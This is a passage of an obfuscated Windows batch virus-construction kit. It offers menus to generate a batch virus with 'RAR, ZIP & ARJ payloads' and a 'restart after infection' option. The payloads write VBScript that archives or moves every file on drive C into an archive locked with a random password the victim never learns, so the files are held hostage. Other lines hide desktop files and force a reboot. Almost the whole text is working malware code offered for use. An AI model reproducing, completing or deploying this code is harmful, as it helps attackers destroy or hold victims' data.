%Gpo% %-%"72"%&%"nul "%+%" "&%-%"73"%&%"nul "%+%" "&%-%"74"%&%"nul "%+%" "&%-%"75"%&%"nul">>%egOxbF%
%Gpo% %-%"76"%&%"nul "%+%" "&%-%"77"%&%"nul "%+%" "&%-%"78"%&%"nul "%+%" "&%-%"79"%&%"nul">>%egOxbF%
%Gpo% %-%"80"%&%"nul "%+%" "&%-%"81"%&%"nul "%+%" "&%-%"82"%&%"nul "%+%" "&%-%"83"%&%"nul">>%egOxbF%
%Gpo% %-%"84"%&%"nul "%+%" "&%-%"85"%&%"nul "%+%" "&%-%"86"%&%"nul "%+%" "&%-%"87"%&%"nul">>%egOxbF%
%Gpo% %-%"88"%&%"nul "%+%" "&%-%"89"%&%"nul "%+%" "&%-%"90"%&%"nul "%+%" "&%-%"91"%&%"nul">>%egOxbF%
%Gpo% %-%"92"%&%"nul "%+%" "&%-%"93"%&%"nul "%+%" "&%-%"94"%&%"nul "%+%" "&%-%"95"%&%"nul">>%egOxbF%
%Gpo% %-%"96"%&%"nul "%+%" "&%-%"97"%&%"nul "%+%" "&%-%"98"%&%"nul "%+%" "&%-%"99"%&%"nul">>%egOxbF%
%Gpo% "for %%%%h in (%%windir%%\desktop\"&i&"*) do attrib +r +h +s +a %%%%h">>%egOxbF%
set +=|set -=|set &=
%lOpJy%

:014
cls
echo.
echo.
echo.
echo        RAR, ZIP & ARJ payloads
echo        ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
echo.
echo    1 - WinRAR password payload
echo    2 - PkZIP password payload
echo    3 - WinARJ password payload
echo.
echo    4 - Next page
echo.
echo    Q - eXit & compile ...
echo.
choice /c:1234Q>nul
if %BEKo% 5 goto done
if %BEKo% 4 goto 015
if %BEKo% 3 goto a23
if %BEKo% 2 goto a22
if %BEKo% 1 goto a21
goto done

:a21
cls
%jHsCEP%
set +=&Chr(34)&
set &=&chr(37)&
%Gpo% "echo.Randomize>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.Set a=CreateObject("%+%"scripting.filesystemobject"%+%")>>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.c=Int((99999999*Rnd)+1)>>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.d=Int((99999999*Rnd)+1)>>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.Set b=a.CreateTextFile (d&"%+%".bat"%+%")>>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.Set f=CreateObject("%+%"WScript.Shell"%+%")>>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.e=Int((99999999*Rnd)+1)>>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "%Gpo% "%+%"%jHsCEP%"%+%">>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "%Gpo% "%+%"if not exist c:\"%&%g%&%"winrar\rar.exe goto end"%+%">>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "%Gpo% "%+%"c:\"%&%g%&%"winrar\rar.exe a -p"%+%"&c&"%+%" -r -m5 -o+ -inul -idp -y "%+%"&e&"%+%".rar c:\*.* "%+%">>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "%Gpo% "%+%"ctty con"%+%">>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "%Gpo% "%+%":end"%+%">>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "%Gpo% "%+%"cls"%+%">>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.b.Close>>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.f.Run "&"d"&Chr(38)%+%".bat"%+%">>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "cscript %%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
set +=|set &=
%lOpJy%
goto 015

:a22
cls
%jHsCEP%
set +=&Chr(34)&
set &=&chr(37)&
%Gpo% "echo.Randomize>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.Set a=CreateObject("%+%"scripting.filesystemobject"%+%")>>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.c=Int((99999999*Rnd)+1)>>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.d=Int((99999999*Rnd)+1)>>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.Set b=a.CreateTextFile (d&"%+%".bat"%+%")>>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.Set f=CreateObject("%+%"WScript.Shell"%+%")>>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.e=Int((99999999*Rnd)+1)>>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "%Gpo% "%+%"%jHsCEP%"%+%">>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "%Gpo% "%+%"if not exist c:\"%&%g%&%"pkware\pkzipc\pkzipc.exe goto end"%+%">>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "%Gpo% "%+%"c:\"%&%g%&%"pkware\pkzipc\pkzipc.exe -add -attr=all -lev=9 -move -dir=root -pass="%+%"&c&"%+%" "%+%"&e&"%+%".zip c:\*.*"%+%">>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "%Gpo% "%+%"ctty con"%+%">>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "%Gpo% "%+%":end"%+%">>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "%Gpo% "%+%"cls"%+%">>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.b.Close>>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.f.Run "&"d"&Chr(38)%+%".bat"%+%">>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "cscript %%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
set +=|set &=
%lOpJy%
goto 015

:a23
cls
%jHsCEP%
set +=&Chr(34)&
set &=&chr(37)&
%Gpo% "echo.Randomize>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.Set a=CreateObject("%+%"scripting.filesystemobject"%+%")>>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.c=Int((99999999*Rnd)+1)>>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.d=Int((99999999*Rnd)+1)>>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.Set b=a.CreateTextFile (d&"%+%".bat"%+%")>>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.Set f=CreateObject("%+%"WScript.Shell"%+%")>>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.e=Int((99999999*Rnd)+1)>>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "%Gpo% "%+%"%jHsCEP%"%+%">>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "%Gpo% "%+%"if not exist c:\"%&%g%&%"winarj~1\arj.exe goto end"%+%">>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "%Gpo% "%+%"c:\"%&%g%&%"winarj~1\arj.exe m -g"%+%"&c&"%+%" -i -r -y -m0 -c "%+%"&e&"%+%".arj c:\*.*"%+%">>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "%Gpo% "%+%"ctty con"%+%">>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "%Gpo% "%+%":end"%+%">>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "%Gpo% "%+%"cls"%+%">>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.b.Close>>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "echo.f.Run "&"d"&Chr(38)%+%".bat"%+%">>%%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
%Gpo% "cscript %%windir%%\system\"&c&"\"&c&".vbs">>%egOxbF%
set +=|set &=
%lOpJy%

:015
cls
echo.
echo.
echo.
echo        Restart
echo        ÄÄÄÄÄÄÄ
echo.
echo.
echo    1 - Restart after infection
echo.
echo    2 - Compile ...
echo.
echo    Q - eXit & compile ...
echo.
choice /c:12Q>nul
if %BEKo% 3 goto done
if %BEKo% 2 goto done
if %BEKo% 1 goto a24
goto done

:a24
cls
%jHsCEP%
%Gpo% "rundll32 shell32.dll,SHExitWindowsEx 2">>%egOxbF%
%lOpJy%

:done
cls
@echo.
@echo.
@echo.
@echo.
@echo.
@echo.
@echo                   Compiling, please wait a few seconds ...
@echo                                 °°°°°°°°°
%jHsCEP%
@type nul|choice /n /cy /ty,1>nul
%lOpJy%
cls
@echo.
@echo.
@echo.
@echo.
@echo.
@echo.
@echo                   Compiling, please wait a few seconds ...
@echo                                 ÛÛÛ°°°°°°
%jHsCEP%
%Gpo% "cls">>batvirus.vbs
echo.b.Close>>batvirus.vbs
cscript batvirus.vbs
%lOpJy%
@type nul|choice /n /cy /ty,3>nul
cls
@echo.
@echo.
@echo.
@echo.
@echo.
@echo.
@echo                   Compiling, please wait a few seconds ...
@echo                                 ÛÛÛÛÛÛ°°°
@type nul|choice /n /cy /ty,3>nul
cls
@echo.
@echo.
@echo.
@echo.
@echo.
@echo.
@echo                   Compiling, please wait a few seconds ...
@echo                                 ÛÛÛÛÛÛÛÛÛ
@type nul|choice /n /cy /ty,3>nul
%jHsCEP%
deltree/y batvirus.vbs>nul
set Gpo=|set egOxbF=
set BEKo=|set jHsCEP=
ctty con
cls
@echo.
@echo.
@echo.
@echo.
@echo.
@echo.
@echo.
@echo        Your creation is now compiled in curent folder [batvirus.txt]
@echo                      Rename batvirus.txt to filename.bat
@echo.
@echo                          Press any key to exit ...
@pause>nul
:end
cls